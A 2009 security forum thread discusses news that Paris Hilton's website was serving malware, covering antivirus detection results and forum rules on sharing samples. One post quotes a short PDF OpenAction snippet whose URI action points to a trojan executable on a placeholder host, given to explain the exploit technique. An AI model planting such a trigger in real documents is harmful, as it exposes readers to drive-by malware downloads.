Paris Hilton's Web Site Infected With Malware

Discussion in 'malware problems & news' started by HURST, Jan 13, 2009.

Thread Status:
Not open for further replies.
  1. HURST

    HURST Registered Member

    By now more AV's should detect it...
    Anyways, here is the whole article:
    http://www.informationweek.com/news...jhtml?articleID=212800229&cid=RSSfeed_IWK_All
     
  2. emperordarius

    emperordarius Registered Member

    That's what happens to who likes Paris Hilton.:D
     
  3. dw426

    dw426 Registered Member

    That's not hot.
     
  4. aigle

    aigle Registered Member

    Tried Dr.Web Link scanner.
     

    Attached Files:

  5. The Hammer

    The Hammer Registered Member

    It would have been interesting to know which seven detected the malware.
     
  6. HURST

    HURST Registered Member

    I have a link to a VirusTotal scan.
    Since we are not allowed to post VT screenshots, are we allowed to list those who passed or post the link?

    BTW, aigle, Dr.Web didn't detect it.
     
    Last edited: Jan 13, 2009
  7. Pedro

    Pedro Registered Member

    I think that's the reason it's not allowed. It invites A vs. B and so on.
     
  8. emperordarius

    emperordarius Registered Member

  9. Dark Shadow

    Dark Shadow Registered Member

    Now if it was Eva Longoria,In a Two piece swim,It may have been worth the malware.
     
  10. elapsed

    elapsed Registered Member

    Hello, could you PM me a copy of the malware please (the sample not the results). Thanks.
     
  11. GES/POR

    GES/POR Registered Member

    Well done to F-Prot's Eldorado's heuristic(edit. heur or gen?) engine for picking up the rootkit, also Prevx(signature?),Avast(gen. sig.),"McArtemis" (in the cloud tech), Avira(packer detection?), Microsoft(sig.), NOD32(gen), Panda(gen), VIPRE(HIPS?), VBA32(default heuristics) :thumb:
     
    Last edited: Jan 13, 2009
  12. HURST

    HURST Registered Member

    I don't have a sample. I just found the link to the results. Also, it's against the forum rules to trade malware.
     
  13. Rmus

    Rmus Exploit Analyst

    From the article:

    This becomes confusing in light of another statement further on:

    A glimpse into the payload:
    Unfortunately, the site has already been cleaned up so we can't test. But the techniques are similar to others that have been analyzed.

    Here is a typical triggering code inside a PDF file, using the URI vulnerability:

    Code:
    ....<< /Type /OpenAction
    /S /URI
    /URI (http://www.some_site.com/trojan.exe)
    
    If the user's PDF reader were vulnerable (not patched) many other solutions would prevent this exploit from executing.

    ----
    rich
     
  14. Jin K

    Jin K Registered Member

    virustotal owner should change from kaspersky 7.0 (shitty heuristic) :thumbd: to kaspersky 8.0!! most of my samples are not detected with kav7
     
Thread Status:
Not open for further replies.
  1. This site uses cookies to help personalise content, tailor your experience and to keep you logged in if you register.
    By continuing to use this site, you are consenting to our use of cookies.
    Dismiss Notice